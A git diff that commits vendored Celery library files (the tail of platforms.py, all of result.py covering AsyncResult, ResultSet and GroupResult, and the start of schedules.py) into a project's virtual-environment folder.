+ """ + try: + _signal.signal(self.signum(name), handler) + except (AttributeError, ValueError): + pass + + def update(self, _d_=None, **sigmap): + """Set signal handlers from a mapping.""" + for name, handler in dict(_d_ or {}, **sigmap).items(): + self[name] = handler + + +signals = Signals() +get_signal = signals.signum # compat +install_signal_handler = signals.__setitem__ # compat +reset_signal = signals.reset # compat +ignore_signal = signals.ignore # compat + + +def signal_name(signum): + """Return name of signal from signal number.""" + return SIGMAP[signum][3:] + + +def strargv(argv): + arg_start = 2 if 'manage' in argv[0] else 1 + if len(argv) > arg_start: + return ' '.join(argv[arg_start:]) + return '' + + +def set_pdeathsig(name): + """Sends signal ``name`` to process when parent process terminates.""" + if signals.supported('SIGKILL'): + try: + _set_pdeathsig(signals.signum('SIGKILL')) + except OSError: + # We ignore when OS does not support set_pdeathsig + pass + + +def set_process_title(progname, info=None): + """Set the :command:`ps` name for the currently running process. + + Only works if :pypi:`setproctitle` is installed. + """ + proctitle = f'[{progname}]' + proctitle = f'{proctitle} {info}' if info else proctitle + if _setproctitle: + _setproctitle.setproctitle(safe_str(proctitle)) + return proctitle + + +if os.environ.get('NOSETPS'): # pragma: no cover + + def set_mp_process_title(*a, **k): + """Disabled feature.""" +else: + + def set_mp_process_title(progname, info=None, hostname=None): + """Set the :command:`ps` name from the current process name. + + Only works if :pypi:`setproctitle` is installed. + """ + if hostname: + progname = f'{progname}: {hostname}' + name = current_process().name if current_process else 'MainProcess' + return set_process_title(f'{progname}:{name}', info=info) + + +def get_errno_name(n): + """Get errno for string (e.g., ``ENOENT``).""" + if isinstance(n, str): + return getattr(errno, n) + return n + + +@contextmanager +def ignore_errno(*errnos, **kwargs): + """Context manager to ignore specific POSIX error codes. + + Takes a list of error codes to ignore: this can be either + the name of the code, or the code integer itself:: + + >>> with ignore_errno('ENOENT'): + ... with open('foo', 'r') as fh: + ... return fh.read() + + >>> with ignore_errno(errno.ENOENT, errno.EPERM): + ... pass + + Arguments: + types (Tuple[Exception]): A tuple of exceptions to ignore + (when the errno matches). Defaults to :exc:`Exception`. + """ + types = kwargs.get('types') or (Exception,) + errnos = [get_errno_name(errno) for errno in errnos] + try: + yield + except types as exc: + if not hasattr(exc, 'errno'): + raise + if exc.errno not in errnos: + raise + + +def check_privileges(accept_content): + if grp is None or pwd is None: + return + pickle_or_serialize = ('pickle' in accept_content + or 'application/group-python-serialize' in accept_content) + + uid = os.getuid() if hasattr(os, 'getuid') else 65535 + gid = os.getgid() if hasattr(os, 'getgid') else 65535 + euid = os.geteuid() if hasattr(os, 'geteuid') else 65535 + egid = os.getegid() if hasattr(os, 'getegid') else 65535 + + if hasattr(os, 'fchown'): + if not all(hasattr(os, attr) + for attr in ('getuid', 'getgid', 'geteuid', 'getegid')): + raise SecurityError('suspicious platform, contact support') + + # Get the group database entry for the current user's group and effective + # group id using grp.getgrgid() method + # We must handle the case where either the gid or the egid are not found. 
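+    # Editor's note (illustrative sketch, not upstream code): the worker
+    # calls this with its configured accept_content, roughly like::
+    #
+    #     check_privileges(['json'])    # fine for an unprivileged user
+    #     check_privileges(['pickle'])  # as root: SecurityError unless the
+    #                                   # C_FORCE_ROOT env var is set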
+ try: + gid_entry = grp.getgrgid(gid) + egid_entry = grp.getgrgid(egid) + except KeyError: + warnings.warn(SecurityWarning(ASSUMING_ROOT)) + _warn_or_raise_security_error(egid, euid, gid, uid, + pickle_or_serialize) + return + + # Get the group and effective group name based on gid + gid_grp_name = gid_entry[0] + egid_grp_name = egid_entry[0] + + # Create lists to use in validation step later. + gids_in_use = (gid_grp_name, egid_grp_name) + groups_with_security_risk = ('sudo', 'wheel') + + is_root = uid == 0 or euid == 0 + # Confirm that the gid and egid are not one that + # can be used to escalate privileges. + if is_root or any(group in gids_in_use + for group in groups_with_security_risk): + _warn_or_raise_security_error(egid, euid, gid, uid, + pickle_or_serialize) + + +def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize): + c_force_root = os.environ.get('C_FORCE_ROOT', False) + + if pickle_or_serialize and not c_force_root: + raise SecurityError(ROOT_DISALLOWED.format( + uid=uid, euid=euid, gid=gid, egid=egid, + )) + + warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format( + uid=uid, euid=euid, gid=gid, egid=egid, + ))) diff --git a/env/Lib/site-packages/celery/result.py b/env/Lib/site-packages/celery/result.py new file mode 100644 index 00000000..0c9e0a30 --- /dev/null +++ b/env/Lib/site-packages/celery/result.py @@ -0,0 +1,1087 @@ +"""Task results/state and results for groups of tasks.""" + +import datetime +import time +from collections import deque +from contextlib import contextmanager +from weakref import proxy + +from kombu.utils.objects import cached_property +from vine import Thenable, barrier, promise + +from . import current_app, states +from ._state import _set_task_join_will_block, task_join_will_block +from .app import app_or_default +from .exceptions import ImproperlyConfigured, IncompleteStream, TimeoutError +from .utils.graph import DependencyGraph, GraphFormatter + +try: + import tblib +except ImportError: + tblib = None + +__all__ = ( + 'ResultBase', 'AsyncResult', 'ResultSet', + 'GroupResult', 'EagerResult', 'result_from_tuple', +) + +E_WOULDBLOCK = """\ +Never call result.get() within a task! +See https://docs.celeryq.dev/en/latest/userguide/tasks.html\ +#avoid-launching-synchronous-subtasks +""" + + +def assert_will_not_block(): + if task_join_will_block(): + raise RuntimeError(E_WOULDBLOCK) + + +@contextmanager +def allow_join_result(): + reset_value = task_join_will_block() + _set_task_join_will_block(False) + try: + yield + finally: + _set_task_join_will_block(reset_value) + + +@contextmanager +def denied_join_result(): + reset_value = task_join_will_block() + _set_task_join_will_block(True) + try: + yield + finally: + _set_task_join_will_block(reset_value) + + +class ResultBase: + """Base class for results.""" + + #: Parent result (if part of a chain) + parent = None + + +@Thenable.register +class AsyncResult(ResultBase): + """Query task state. + + Arguments: + id (str): See :attr:`id`. + backend (Backend): See :attr:`backend`. + """ + + app = None + + #: Error raised for timeouts. + TimeoutError = TimeoutError + + #: The task's UUID. + id = None + + #: The task result backend to use. 
+ backend = None + + def __init__(self, id, backend=None, + task_name=None, # deprecated + app=None, parent=None): + if id is None: + raise ValueError( + f'AsyncResult requires valid id, not {type(id)}') + self.app = app_or_default(app or self.app) + self.id = id + self.backend = backend or self.app.backend + self.parent = parent + self.on_ready = promise(self._on_fulfilled, weak=True) + self._cache = None + self._ignored = False + + @property + def ignored(self): + """If True, task result retrieval is disabled.""" + if hasattr(self, '_ignored'): + return self._ignored + return False + + @ignored.setter + def ignored(self, value): + """Enable/disable task result retrieval.""" + self._ignored = value + + def then(self, callback, on_error=None, weak=False): + self.backend.add_pending_result(self, weak=weak) + return self.on_ready.then(callback, on_error) + + def _on_fulfilled(self, result): + self.backend.remove_pending_result(self) + return result + + def as_tuple(self): + parent = self.parent + return (self.id, parent and parent.as_tuple()), None + + def as_list(self): + """Return as a list of task IDs.""" + results = [] + parent = self.parent + results.append(self.id) + if parent is not None: + results.extend(parent.as_list()) + return results + + def forget(self): + """Forget the result of this task and its parents.""" + self._cache = None + if self.parent: + self.parent.forget() + self.backend.forget(self.id) + + def revoke(self, connection=None, terminate=False, signal=None, + wait=False, timeout=None): + """Send revoke signal to all workers. + + Any worker receiving the task, or having reserved the + task, *must* ignore it. + + Arguments: + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + wait (bool): Wait for replies from workers. + The ``timeout`` argument specifies the seconds to wait. + Disabled by default. + timeout (float): Time in seconds to wait for replies when + ``wait`` is enabled. + """ + self.app.control.revoke(self.id, connection=connection, + terminate=terminate, signal=signal, + reply=wait, timeout=timeout) + + def revoke_by_stamped_headers(self, headers, connection=None, terminate=False, signal=None, + wait=False, timeout=None): + """Send revoke signal to all workers only for tasks with matching headers values. + + Any worker receiving the task, or having reserved the + task, *must* ignore it. + All header fields *must* match. + + Arguments: + headers (dict[str, Union(str, list)]): Headers to match when revoking tasks. + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + wait (bool): Wait for replies from workers. + The ``timeout`` argument specifies the seconds to wait. + Disabled by default. + timeout (float): Time in seconds to wait for replies when + ``wait`` is enabled. + """ + self.app.control.revoke_by_stamped_headers(headers, connection=connection, + terminate=terminate, signal=signal, + reply=wait, timeout=timeout) + + def get(self, timeout=None, propagate=True, interval=0.5, + no_ack=True, follow_parents=True, callback=None, on_message=None, + on_interval=None, disable_sync_subtasks=True, + EXCEPTION_STATES=states.EXCEPTION_STATES, + PROPAGATE_STATES=states.PROPAGATE_STATES): + """Wait until task is ready, and return its result. + + Warning: + Waiting for tasks within a task may lead to deadlocks. 
+ Please read :ref:`task-synchronous-subtasks`. + + Warning: + Backends use resources to store and transmit results. To ensure + that resources are released, you must eventually call + :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on + EVERY :class:`~@AsyncResult` instance returned after calling + a task. + + Arguments: + timeout (float): How long to wait, in seconds, before the + operation times out. This is the setting for the publisher + (celery client) and is different from `timeout` parameter of + `@app.task`, which is the setting for the worker. The task + isn't terminated even if timeout occurs. + propagate (bool): Re-raise exception if the task failed. + interval (float): Time to wait (in seconds) before retrying to + retrieve the result. Note that this does not have any effect + when using the RPC/redis result store backends, as they don't + use polling. + no_ack (bool): Enable amqp no ack (automatically acknowledge + message). If this is :const:`False` then the message will + **not be acked**. + follow_parents (bool): Re-raise any exception raised by + parent tasks. + disable_sync_subtasks (bool): Disable tasks to wait for sub tasks + this is the default configuration. CAUTION do not enable this + unless you must. + + Raises: + celery.exceptions.TimeoutError: if `timeout` isn't + :const:`None` and the result does not arrive within + `timeout` seconds. + Exception: If the remote call raised an exception then that + exception will be re-raised in the caller process. + """ + if self.ignored: + return + + if disable_sync_subtasks: + assert_will_not_block() + _on_interval = promise() + if follow_parents and propagate and self.parent: + _on_interval = promise(self._maybe_reraise_parent_error, weak=True) + self._maybe_reraise_parent_error() + if on_interval: + _on_interval.then(on_interval) + + if self._cache: + if propagate: + self.maybe_throw(callback=callback) + return self.result + + self.backend.add_pending_result(self) + return self.backend.wait_for_pending( + self, timeout=timeout, + interval=interval, + on_interval=_on_interval, + no_ack=no_ack, + propagate=propagate, + callback=callback, + on_message=on_message, + ) + wait = get # deprecated alias to :meth:`get`. + + def _maybe_reraise_parent_error(self): + for node in reversed(list(self._parents())): + node.maybe_throw() + + def _parents(self): + node = self.parent + while node: + yield node + node = node.parent + + def collect(self, intermediate=False, **kwargs): + """Collect results as they return. + + Iterator, like :meth:`get` will wait for the task to complete, + but will also follow :class:`AsyncResult` and :class:`ResultSet` + returned by the task, yielding ``(result, value)`` tuples for each + result in the tree. + + An example would be having the following tasks: + + .. code-block:: python + + from celery import group + from proj.celery import app + + @app.task(trail=True) + def A(how_many): + return group(B.s(i) for i in range(how_many))() + + @app.task(trail=True) + def B(i): + return pow2.delay(i) + + @app.task(trail=True) + def pow2(i): + return i ** 2 + + .. code-block:: pycon + + >>> from celery.result import ResultBase + >>> from proj.tasks import A + + >>> result = A.delay(10) + >>> [v for v in result.collect() + ... if not isinstance(v, (ResultBase, tuple))] + [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] + + Note: + The ``Task.trail`` option must be enabled + so that the list of children is stored in ``result.children``. + This is the default but enabled explicitly for illustration. 
+ + Yields: + Tuple[AsyncResult, Any]: tuples containing the result instance + of the child task, and the return value of that task. + """ + for _, R in self.iterdeps(intermediate=intermediate): + yield R, R.get(**kwargs) + + def get_leaf(self): + value = None + for _, R in self.iterdeps(): + value = R.get() + return value + + def iterdeps(self, intermediate=False): + stack = deque([(None, self)]) + + is_incomplete_stream = not intermediate + + while stack: + parent, node = stack.popleft() + yield parent, node + if node.ready(): + stack.extend((node, child) for child in node.children or []) + else: + if is_incomplete_stream: + raise IncompleteStream() + + def ready(self): + """Return :const:`True` if the task has executed. + + If the task is still running, pending, or is waiting + for retry then :const:`False` is returned. + """ + return self.state in self.backend.READY_STATES + + def successful(self): + """Return :const:`True` if the task executed successfully.""" + return self.state == states.SUCCESS + + def failed(self): + """Return :const:`True` if the task failed.""" + return self.state == states.FAILURE + + def throw(self, *args, **kwargs): + self.on_ready.throw(*args, **kwargs) + + def maybe_throw(self, propagate=True, callback=None): + cache = self._get_task_meta() if self._cache is None else self._cache + state, value, tb = ( + cache['status'], cache['result'], cache.get('traceback')) + if state in states.PROPAGATE_STATES and propagate: + self.throw(value, self._to_remote_traceback(tb)) + if callback is not None: + callback(self.id, value) + return value + maybe_reraise = maybe_throw # XXX compat alias + + def _to_remote_traceback(self, tb): + if tb and tblib is not None and self.app.conf.task_remote_tracebacks: + return tblib.Traceback.from_string(tb).as_traceback() + + def build_graph(self, intermediate=False, formatter=None): + graph = DependencyGraph( + formatter=formatter or GraphFormatter(root=self.id, shape='oval'), + ) + for parent, node in self.iterdeps(intermediate=intermediate): + graph.add_arc(node) + if parent: + graph.add_edge(parent, node) + return graph + + def __str__(self): + """`str(self) -> self.id`.""" + return str(self.id) + + def __hash__(self): + """`hash(self) -> hash(self.id)`.""" + return hash(self.id) + + def __repr__(self): + return f'<{type(self).__name__}: {self.id}>' + + def __eq__(self, other): + if isinstance(other, AsyncResult): + return other.id == self.id + elif isinstance(other, str): + return other == self.id + return NotImplemented + + def __copy__(self): + return self.__class__( + self.id, self.backend, None, self.app, self.parent, + ) + + def __reduce__(self): + return self.__class__, self.__reduce_args__() + + def __reduce_args__(self): + return self.id, self.backend, None, None, self.parent + + def __del__(self): + """Cancel pending operations when the instance is destroyed.""" + if self.backend is not None: + self.backend.remove_pending_result(self) + + @cached_property + def graph(self): + return self.build_graph() + + @property + def supports_native_join(self): + return self.backend.supports_native_join + + @property + def children(self): + return self._get_task_meta().get('children') + + def _maybe_set_cache(self, meta): + if meta: + state = meta['status'] + if state in states.READY_STATES: + d = self._set_cache(self.backend.meta_from_decoded(meta)) + self.on_ready(self) + return d + return meta + + def _get_task_meta(self): + if self._cache is None: + return self._maybe_set_cache(self.backend.get_task_meta(self.id)) + return 
self._cache
+
+    def _iter_meta(self, **kwargs):
+        return iter([self._get_task_meta()])
+
+    def _set_cache(self, d):
+        children = d.get('children')
+        if children:
+            d['children'] = [
+                result_from_tuple(child, self.app) for child in children
+            ]
+        self._cache = d
+        return d
+
+    @property
+    def result(self):
+        """Task return value.
+
+        Note:
+            When the task has been executed, this contains the return value.
+            If the task raised an exception, this will be the exception
+            instance.
+        """
+        return self._get_task_meta()['result']
+    info = result
+
+    @property
+    def traceback(self):
+        """Get the traceback of a failed task."""
+        return self._get_task_meta().get('traceback')
+
+    @property
+    def state(self):
+        """The task's current state.
+
+        Possible values include:
+
+            *PENDING*
+
+                The task is waiting for execution.
+
+            *STARTED*
+
+                The task has been started.
+
+            *RETRY*
+
+                The task is to be retried, possibly because of failure.
+
+            *FAILURE*
+
+                The task raised an exception, or has exceeded the retry limit.
+                The :attr:`result` attribute then contains the
+                exception raised by the task.
+
+            *SUCCESS*
+
+                The task executed successfully.  The :attr:`result` attribute
+                then contains the task's return value.
+        """
+        return self._get_task_meta()['status']
+    status = state  # XXX compat
+
+    @property
+    def task_id(self):
+        """Compat. alias to :attr:`id`."""
+        return self.id
+
+    @task_id.setter
+    def task_id(self, id):
+        self.id = id
+
+    @property
+    def name(self):
+        return self._get_task_meta().get('name')
+
+    @property
+    def args(self):
+        return self._get_task_meta().get('args')
+
+    @property
+    def kwargs(self):
+        return self._get_task_meta().get('kwargs')
+
+    @property
+    def worker(self):
+        return self._get_task_meta().get('worker')
+
+    @property
+    def date_done(self):
+        """UTC date and time."""
+        date_done = self._get_task_meta().get('date_done')
+        if date_done and not isinstance(date_done, datetime.datetime):
+            return datetime.datetime.fromisoformat(date_done)
+        return date_done
+
+    @property
+    def retries(self):
+        return self._get_task_meta().get('retries')
+
+    @property
+    def queue(self):
+        return self._get_task_meta().get('queue')
+
+
+@Thenable.register
+class ResultSet(ResultBase):
+    """A collection of results.
+
+    Arguments:
+        results (Sequence[AsyncResult]): List of result instances.
+    """
+
+    _app = None
+
+    #: List of results in the set.
+    results = None
+
+    def __init__(self, results, app=None, ready_barrier=None, **kwargs):
+        self._app = app
+        self.results = results
+        self.on_ready = promise(args=(proxy(self),))
+        self._on_full = ready_barrier or barrier(results)
+        if self._on_full:
+            self._on_full.then(promise(self._on_ready, weak=True))
+
+    def add(self, result):
+        """Add :class:`AsyncResult` as a new member of the set.
+
+        Does nothing if the result is already a member.
+        """
+        if result not in self.results:
+            self.results.append(result)
+            if self._on_full:
+                self._on_full.add(result)
+
+    def _on_ready(self):
+        if self.backend.is_async:
+            self.on_ready()
+
+    def remove(self, result):
+        """Remove result from the set; it must be a member.
+
+        Raises:
+            KeyError: if the result isn't a member.
+        """
+        if isinstance(result, str):
+            result = self.app.AsyncResult(result)
+        try:
+            self.results.remove(result)
+        except ValueError:
+            raise KeyError(result)
+
+    def discard(self, result):
+        """Remove result from the set if it is a member.
+
+        Does nothing if it's not a member.
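+
+        Example (editor's illustrative sketch; ``rs`` and ``res`` are an
+        assumed :class:`ResultSet` and one of its members):
+
+        .. code-block:: pycon
+
+            >>> rs.discard(res)   # removed
+            >>> rs.discard(res)   # no longer a member: silently ignored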
+        """
+        try:
+            self.remove(result)
+        except KeyError:
+            pass
+
+    def update(self, results):
+        """Extend from iterable of results."""
+        self.results.extend(r for r in results if r not in self.results)
+
+    def clear(self):
+        """Remove all results from this set."""
+        self.results[:] = []  # don't create new list.
+
+    def successful(self):
+        """Return true if all tasks were successful.
+
+        Returns:
+            bool: true if all of the tasks finished
+                successfully (i.e. didn't raise an exception).
+        """
+        return all(result.successful() for result in self.results)
+
+    def failed(self):
+        """Return true if any of the tasks failed.
+
+        Returns:
+            bool: true if one of the tasks failed
+                (i.e., raised an exception).
+        """
+        return any(result.failed() for result in self.results)
+
+    def maybe_throw(self, callback=None, propagate=True):
+        for result in self.results:
+            result.maybe_throw(callback=callback, propagate=propagate)
+    maybe_reraise = maybe_throw  # XXX compat alias.
+
+    def waiting(self):
+        """Return true if any of the tasks are incomplete.
+
+        Returns:
+            bool: true if any of the tasks is still
+                waiting for execution.
+        """
+        return any(not result.ready() for result in self.results)
+
+    def ready(self):
+        """Did all of the tasks complete? (either by success or failure).
+
+        Returns:
+            bool: true if all of the tasks have been executed.
+        """
+        return all(result.ready() for result in self.results)
+
+    def completed_count(self):
+        """Task completion count.
+
+        Note that `complete` means `successful` in this context. In other words, the
+        return value of this method is the number of ``successful`` tasks.
+
+        Returns:
+            int: the number of complete (i.e. successful) tasks.
+        """
+        return sum(int(result.successful()) for result in self.results)
+
+    def forget(self):
+        """Forget about (and possibly remove the result of) all the tasks."""
+        for result in self.results:
+            result.forget()
+
+    def revoke(self, connection=None, terminate=False, signal=None,
+               wait=False, timeout=None):
+        """Send revoke signal to all workers for all tasks in the set.
+
+        Arguments:
+            terminate (bool): Also terminate the process currently working
+                on the task (if any).
+            signal (str): Name of signal to send to process if terminate.
+                Default is TERM.
+            wait (bool): Wait for replies from worker.
+                The ``timeout`` argument specifies the number of seconds
+                to wait.  Disabled by default.
+            timeout (float): Time in seconds to wait for replies when
+                the ``wait`` argument is enabled.
+        """
+        self.app.control.revoke([r.id for r in self.results],
+                                connection=connection, timeout=timeout,
+                                terminate=terminate, signal=signal, reply=wait)
+
+    def __iter__(self):
+        return iter(self.results)
+
+    def __getitem__(self, index):
+        """`res[i] -> res.results[i]`."""
+        return self.results[index]
+
+    def get(self, timeout=None, propagate=True, interval=0.5,
+            callback=None, no_ack=True, on_message=None,
+            disable_sync_subtasks=True, on_interval=None):
+        """See :meth:`join`.
+
+        This is here for API compatibility with :class:`AsyncResult`;
+        in addition it uses :meth:`join_native` if available for the
+        current result backend.
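+
+        Example (editor's illustrative sketch; assumes a configured result
+        backend and a registered ``add`` task):
+
+        .. code-block:: pycon
+
+            >>> from celery import group
+            >>> res = group(add.s(i, i) for i in range(3)).apply_async()
+            >>> res.get(timeout=10)
+            [0, 2, 4]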
+ """ + return (self.join_native if self.supports_native_join else self.join)( + timeout=timeout, propagate=propagate, + interval=interval, callback=callback, no_ack=no_ack, + on_message=on_message, disable_sync_subtasks=disable_sync_subtasks, + on_interval=on_interval, + ) + + def join(self, timeout=None, propagate=True, interval=0.5, + callback=None, no_ack=True, on_message=None, + disable_sync_subtasks=True, on_interval=None): + """Gather the results of all tasks as a list in order. + + Note: + This can be an expensive operation for result store + backends that must resort to polling (e.g., database). + + You should consider using :meth:`join_native` if your backend + supports it. + + Warning: + Waiting for tasks within a task may lead to deadlocks. + Please see :ref:`task-synchronous-subtasks`. + + Arguments: + timeout (float): The number of seconds to wait for results + before the operation times out. + propagate (bool): If any of the tasks raises an exception, + the exception will be re-raised when this flag is set. + interval (float): Time to wait (in seconds) before retrying to + retrieve a result from the set. Note that this does not have + any effect when using the amqp result store backend, + as it does not use polling. + callback (Callable): Optional callback to be called for every + result received. Must have signature ``(task_id, value)`` + No results will be returned by this function if a callback + is specified. The order of results is also arbitrary when a + callback is used. To get access to the result object for + a particular id you'll have to generate an index first: + ``index = {r.id: r for r in gres.results.values()}`` + Or you can create new result objects on the fly: + ``result = app.AsyncResult(task_id)`` (both will + take advantage of the backend cache anyway). + no_ack (bool): Automatic message acknowledgment (Note that if this + is set to :const:`False` then the messages + *will not be acknowledged*). + disable_sync_subtasks (bool): Disable tasks to wait for sub tasks + this is the default configuration. CAUTION do not enable this + unless you must. + + Raises: + celery.exceptions.TimeoutError: if ``timeout`` isn't + :const:`None` and the operation takes longer than ``timeout`` + seconds. + """ + if disable_sync_subtasks: + assert_will_not_block() + time_start = time.monotonic() + remaining = None + + if on_message is not None: + raise ImproperlyConfigured( + 'Backend does not support on_message callback') + + results = [] + for result in self.results: + remaining = None + if timeout: + remaining = timeout - (time.monotonic() - time_start) + if remaining <= 0.0: + raise TimeoutError('join operation timed out') + value = result.get( + timeout=remaining, propagate=propagate, + interval=interval, no_ack=no_ack, on_interval=on_interval, + disable_sync_subtasks=disable_sync_subtasks, + ) + if callback: + callback(result.id, value) + else: + results.append(value) + return results + + def then(self, callback, on_error=None, weak=False): + return self.on_ready.then(callback, on_error) + + def iter_native(self, timeout=None, interval=0.5, no_ack=True, + on_message=None, on_interval=None): + """Backend optimized version of :meth:`iterate`. + + .. versionadded:: 2.2 + + Note that this does not support collecting the results + for different task types using different backends. + + This is currently only supported by the amqp, Redis and cache + result backends. 
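+
+        Example (editor's illustrative sketch; ``res`` is an assumed
+        :class:`ResultSet` on one of the backends named above):
+
+        .. code-block:: pycon
+
+            >>> for task_id, meta in res.iter_native(timeout=10):
+            ...     print(task_id, meta['status'], meta['result'])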
+ """ + return self.backend.iter_native( + self, + timeout=timeout, interval=interval, no_ack=no_ack, + on_message=on_message, on_interval=on_interval, + ) + + def join_native(self, timeout=None, propagate=True, + interval=0.5, callback=None, no_ack=True, + on_message=None, on_interval=None, + disable_sync_subtasks=True): + """Backend optimized version of :meth:`join`. + + .. versionadded:: 2.2 + + Note that this does not support collecting the results + for different task types using different backends. + + This is currently only supported by the amqp, Redis and cache + result backends. + """ + if disable_sync_subtasks: + assert_will_not_block() + order_index = None if callback else { + result.id: i for i, result in enumerate(self.results) + } + acc = None if callback else [None for _ in range(len(self))] + for task_id, meta in self.iter_native(timeout, interval, no_ack, + on_message, on_interval): + if isinstance(meta, list): + value = [] + for children_result in meta: + value.append(children_result.get()) + else: + value = meta['result'] + if propagate and meta['status'] in states.PROPAGATE_STATES: + raise value + if callback: + callback(task_id, value) + else: + acc[order_index[task_id]] = value + return acc + + def _iter_meta(self, **kwargs): + return (meta for _, meta in self.backend.get_many( + {r.id for r in self.results}, max_iterations=1, **kwargs + )) + + def _failed_join_report(self): + return (res for res in self.results + if res.backend.is_cached(res.id) and + res.state in states.PROPAGATE_STATES) + + def __len__(self): + return len(self.results) + + def __eq__(self, other): + if isinstance(other, ResultSet): + return other.results == self.results + return NotImplemented + + def __repr__(self): + return f'<{type(self).__name__}: [{", ".join(r.id for r in self.results)}]>' + + @property + def supports_native_join(self): + try: + return self.results[0].supports_native_join + except IndexError: + pass + + @property + def app(self): + if self._app is None: + self._app = (self.results[0].app if self.results else + current_app._get_current_object()) + return self._app + + @app.setter + def app(self, app): + self._app = app + + @property + def backend(self): + return self.app.backend if self.app else self.results[0].backend + + +@Thenable.register +class GroupResult(ResultSet): + """Like :class:`ResultSet`, but with an associated id. + + This type is returned by :class:`~celery.group`. + + It enables inspection of the tasks state and return values as + a single entity. + + Arguments: + id (str): The id of the group. + results (Sequence[AsyncResult]): List of result instances. + parent (ResultBase): Parent result of this group. + """ + + #: The UUID of the group. + id = None + + #: List/iterator of results in the group + results = None + + def __init__(self, id=None, results=None, parent=None, **kwargs): + self.id = id + self.parent = parent + super().__init__(results, **kwargs) + + def _on_ready(self): + self.backend.remove_pending_result(self) + super()._on_ready() + + def save(self, backend=None): + """Save group-result for later retrieval using :meth:`restore`. + + Example: + >>> def save_and_restore(result): + ... result.save() + ... 
result = GroupResult.restore(result.id)
+        """
+        return (backend or self.app.backend).save_group(self.id, self)
+
+    def delete(self, backend=None):
+        """Remove this result if it was previously saved."""
+        (backend or self.app.backend).delete_group(self.id)
+
+    def __reduce__(self):
+        return self.__class__, self.__reduce_args__()
+
+    def __reduce_args__(self):
+        return self.id, self.results
+
+    def __bool__(self):
+        return bool(self.id or self.results)
+    __nonzero__ = __bool__  # Included for Py2 backwards compatibility
+
+    def __eq__(self, other):
+        if isinstance(other, GroupResult):
+            return (
+                other.id == self.id and
+                other.results == self.results and
+                other.parent == self.parent
+            )
+        elif isinstance(other, str):
+            return other == self.id
+        return NotImplemented
+
+    def __repr__(self):
+        return f'<{type(self).__name__}: {self.id} [{", ".join(r.id for r in self.results)}]>'
+
+    def __str__(self):
+        """`str(self) -> self.id`."""
+        return str(self.id)
+
+    def __hash__(self):
+        """`hash(self) -> hash(self.id)`."""
+        return hash(self.id)
+
+    def as_tuple(self):
+        return (
+            (self.id, self.parent and self.parent.as_tuple()),
+            [r.as_tuple() for r in self.results]
+        )
+
+    @property
+    def children(self):
+        return self.results
+
+    @classmethod
+    def restore(cls, id, backend=None, app=None):
+        """Restore previously saved group result."""
+        app = app or (
+            cls.app if not isinstance(cls.app, property) else current_app
+        )
+        backend = backend or app.backend
+        return backend.restore_group(id)
+
+
+@Thenable.register
+class EagerResult(AsyncResult):
+    """Result that we know has already been executed."""
+
+    def __init__(self, id, ret_value, state, traceback=None):
+        # pylint: disable=super-init-not-called
+        # XXX should really not be inheriting from AsyncResult
+        self.id = id
+        self._result = ret_value
+        self._state = state
+        self._traceback = traceback
+        self.on_ready = promise()
+        self.on_ready(self)
+
+    def then(self, callback, on_error=None, weak=False):
+        return self.on_ready.then(callback, on_error)
+
+    def _get_task_meta(self):
+        return self._cache
+
+    def __reduce__(self):
+        return self.__class__, self.__reduce_args__()
+
+    def __reduce_args__(self):
+        return (self.id, self._result, self._state, self._traceback)
+
+    def __copy__(self):
+        cls, args = self.__reduce__()
+        return cls(*args)
+
+    def ready(self):
+        return True
+
+    def get(self, timeout=None, propagate=True,
+            disable_sync_subtasks=True, **kwargs):
+        if disable_sync_subtasks:
+            assert_will_not_block()
+
+        if self.successful():
+            return self.result
+        elif self.state in states.PROPAGATE_STATES:
+            if propagate:
+                raise self.result if isinstance(
+                    self.result, Exception) else Exception(self.result)
+            return self.result
+    wait = get  # XXX Compat (remove 5.0)
+
+    def forget(self):
+        pass
+
+    def revoke(self, *args, **kwargs):
+        self._state = states.REVOKED
+
+    def __repr__(self):
+        return f'<EagerResult: {self.id}>'
+
+    @property
+    def _cache(self):
+        return {
+            'task_id': self.id,
+            'result': self._result,
+            'status': self._state,
+            'traceback': self._traceback,
+        }
+
+    @property
+    def result(self):
+        """The task's return value."""
+        return self._result
+
+    @property
+    def state(self):
+        """The task's state."""
+        return self._state
+    status = state
+
+    @property
+    def traceback(self):
+        """The traceback if the task failed."""
+        return self._traceback
+
+    @property
+    def supports_native_join(self):
+        return False
+
+
+def result_from_tuple(r, app=None):
+    """Deserialize result from tuple."""
+    # earlier backends may just pickle, so check if
+    # result is already prepared.
+    app = app_or_default(app)
+    Result = app.AsyncResult
+    if not isinstance(r, ResultBase):
+        res, nodes = r
+        id, parent = res if isinstance(res, (list, tuple)) else (res, None)
+        if parent:
+            parent = result_from_tuple(parent, app)
+
+        if nodes is not None:
+            return app.GroupResult(
+                id, [result_from_tuple(child, app) for child in nodes],
+                parent=parent,
+            )
+
+        return Result(id, parent=parent)
+    return r
diff --git a/env/Lib/site-packages/celery/schedules.py b/env/Lib/site-packages/celery/schedules.py
new file mode 100644
index 00000000..b35436ae
--- /dev/null
+++ b/env/Lib/site-packages/celery/schedules.py
@@ -0,0 +1,865 @@
+"""Schedules define the intervals at which periodic tasks run."""
+from __future__ import annotations
+
+import re
+from bisect import bisect, bisect_left
+from collections import namedtuple
+from collections.abc import Iterable
+from datetime import datetime, timedelta, tzinfo
+from typing import Any, Callable, Mapping, Sequence
+
+from kombu.utils.objects import cached_property
+
+from celery import Celery
+
+from . import current_app
+from .utils.collections import AttributeDict
+from .utils.time import (ffwd, humanize_seconds, localize, maybe_make_aware, maybe_timedelta, remaining, timezone,
+                         weekday)
+
+__all__ = (
+    'ParseException', 'schedule', 'crontab', 'crontab_parser',
+    'maybe_schedule', 'solar',
+)
+
+schedstate = namedtuple('schedstate', ('is_due', 'next'))
+
+CRON_PATTERN_INVALID = """\
+Invalid crontab pattern. Valid range is {min}-{max}. \
+'{value}' was found.\
+"""
+
+CRON_INVALID_TYPE = """\
+Argument cronspec needs to be of any of the following types: \
+int, str, or an iterable type. {type!r} was given.\
+"""
+
+CRON_REPR = """\
+<crontab: {0._orig_minute} {0._orig_hour} {0._orig_day_of_week} \
+{0._orig_day_of_month} {0._orig_month_of_year} (m/h/dow/dom/moy)>\
+"""
+
